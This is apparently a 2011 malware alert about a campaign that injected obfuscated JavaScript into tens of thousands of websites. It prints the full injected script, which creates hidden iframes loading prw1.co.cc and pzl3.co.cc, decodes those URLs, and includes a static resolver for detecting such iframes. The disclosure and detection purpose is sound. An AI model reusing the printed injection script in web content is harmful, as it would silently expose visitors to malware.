• prw1.co.cc Malware Alert

    Attackers are infecting websites in droves using a relatively new kind of malware. Websites are the newest malware battleground: benign sites are being compromised and then used to infect their visitors.

    In the vast majority of cases, the affected website owners are completely oblivious to the fact that a malicious hacker has used their website to infect their visitors. In this article we will show a new strain of malware that has already infected 43,000 websites.

    Identifying the Malware
    The specific piece of malware:

    y='rum';n='s';fp='afe';e='tp';bo='/f';lk='o.c';bl='742';x='7';i='ra';h='c';gf='.';fl='ht';q='//';w='c';pu='554';mk='p?';qg='tp=';il='ph';yy='o';am='5e';k='.c';c='me';u='r';d='20a';qd='1';z='prw';xu='if';iy='a';f=':';a=xu.concat(i,c);kx=n.concat(u,h);l=fl.concat(e,f,q,z,qd,k,lk,w,bo,yy,y,gf,il,mk,qg,bl,d,am,pu,fp,iy,x);var ov=document.createElement(a);ov.setAttribute('width','5');ov.setAttribute('height','5');ov.setAttribute('style','display:none');ov.setAttribute(kx,l);document.body.appendChild(ov);lb='r';r='d3b';q='.c';b='or';v='e';bi='e30';gl='?';j='c/f';ru='l';pj='a';zh='m.';h='a';xc='me';i='c';z='tp:';n='4';ye='=';lg='s';qk='426';jp='ht';g='a';k='z';ut='u';c='//p';pr='7f';o='i';by='fr';ck='3';pl='php';pe='tp';e='a';nc='.co';gz=o.concat(by,h,xc);kx=lg.concat(lb,i);dv=jp.concat(z,c,k,ru,ck,nc,q,j,b,ut,zh,pl,gl,pe,ye,v,pj,r,e,qk,pr,bi,g,n);var bo=document.createElement(gz);bo.setAttribute('width','5');bo.setAttribute('height','5');bo.setAttribute('style','display:none');bo.setAttribute(kx,dv);document.body.appendChild(bo);
    

    Once its string fragments are joined, this script adds a hidden iframe (5 by 5 pixels, display:none) to the infected webpage:

    iframe setAttribute src = http://prw1.co.cc/forum.php?tp=74220a5e554afea7
    

    The script creates two such iframes, one for each of the following sites, which serve the code used to infect the website visitor:

    pzl3.co.cc/forum.php?tp=ead3ba4267fe30a4
    prw1.co.cc/forum.php?tp=74220a5e554afea7
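
The script above can be decoded without running it. The following is an added example, not code from the original article: a static resolver that replays the string assignments and concat() calls in order and reports the src of any hidden iframe the script builds. The function names and the sample string with the placeholder host example.invalid are constructed for illustration.

```javascript
// Static resolver for the string-splitting obfuscation: no eval, no DOM, nothing is fetched.
// Assumes literals contain no ';' or ',' (true for the sample on this page).
function resolveInjectedElements(script) {
  const env = new Map();      // variable name -> resolved string
  const bound = new Map();    // variable name -> element it currently holds
  const found = [];           // every element created, in order
  const value = (tok) => {    // quoted literal, or identifier looked up in env
    const lit = /^'([^']*)'$/.exec(tok.trim());
    return lit ? lit[1] : (env.get(tok.trim()) ?? '');
  };
  // Statements are applied in order because the script reuses variable names.
  for (const stmt of script.split(';')) {
    let m;
    if ((m = /^\s*(?:var\s+)?(\w+)\s*=\s*'([^']*)'\s*$/.exec(stmt))) {
      env.set(m[1], m[2]);
    } else if ((m = /^\s*(?:var\s+)?(\w+)\s*=\s*(\w+)\.concat\(([^)]*)\)\s*$/.exec(stmt))) {
      env.set(m[1], value(m[2]) + m[3].split(',').map(value).join(''));
    } else if ((m = /^\s*(?:var\s+)?(\w+)\s*=\s*document\.createElement\(([^)]*)\)\s*$/.exec(stmt))) {
      const el = { tag: value(m[2]), attrs: {} };
      bound.set(m[1], el);
      found.push(el);
    } else if ((m = /^\s*(\w+)\.setAttribute\(([^,]+),([^)]*)\)\s*$/.exec(stmt))) {
      const el = bound.get(m[1]);
      if (el) el.attrs[value(m[2])] = value(m[3]);
    }
  }
  return found;
}

// URLs loaded by iframes that the script creates and hides with display:none.
function hiddenIframeSources(script) {
  return resolveInjectedElements(script)
    .filter((el) => el.tag.toLowerCase() === 'iframe' &&
      /display\s*:\s*none/i.test(el.attrs.style || '') && el.attrs.src)
    .map((el) => el.attrs.src);
}

// Constructed sample in the same style; example.invalid is a placeholder host.
const SAMPLE =
  "p='ht';a='if';q='tp://ex';c='me';r='ample.inv';b='ra';u='alid/x.p';s='sr';w='hp?tp=00';t='c';" +
  "tag=a.concat(b,c);at=s.concat(t);url=p.concat(q,r,u,w);var f=document.createElement(tag);" +
  "f.setAttribute('style','display:none');f.setAttribute(at,url);document.body.appendChild(f);";

console.log(hiddenIframeSources(SAMPLE)); // [ 'http://example.invalid/x.php?tp=00' ]
```

Applied to the script shown above, it returns the two forum.php URLs listed in this section.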
    

    Growth of Infected Sites
    The number of infected sites has grown significantly over the last few days. In less than a month, we have seen the number of sites more than double.

    Blacklist Services Not Reacting Quickly
    Current website reputation services have not yet started flagging sites with this specific malware. Many infected sites have not yet been blacklisted by Google Chrome, Firefox, Bing, Yahoo or other search engines and blacklist sources. Below we present a small sample of infected sites which have not yet been blacklisted and will infect visitors who open them.

    Infected sites that have not been blacklisted (As of April 23, 2011):

    

    Anti-Virus Not Capable of Detecting the Infection
    Anti-virus engines are woefully inadequate at hunting down web malware. We present screenshots to show the poor detection capabilities of anti-virus engines with respect to this specific piece of malware. We see below that only 1 out of 41 AV engines was able to flag the malware.
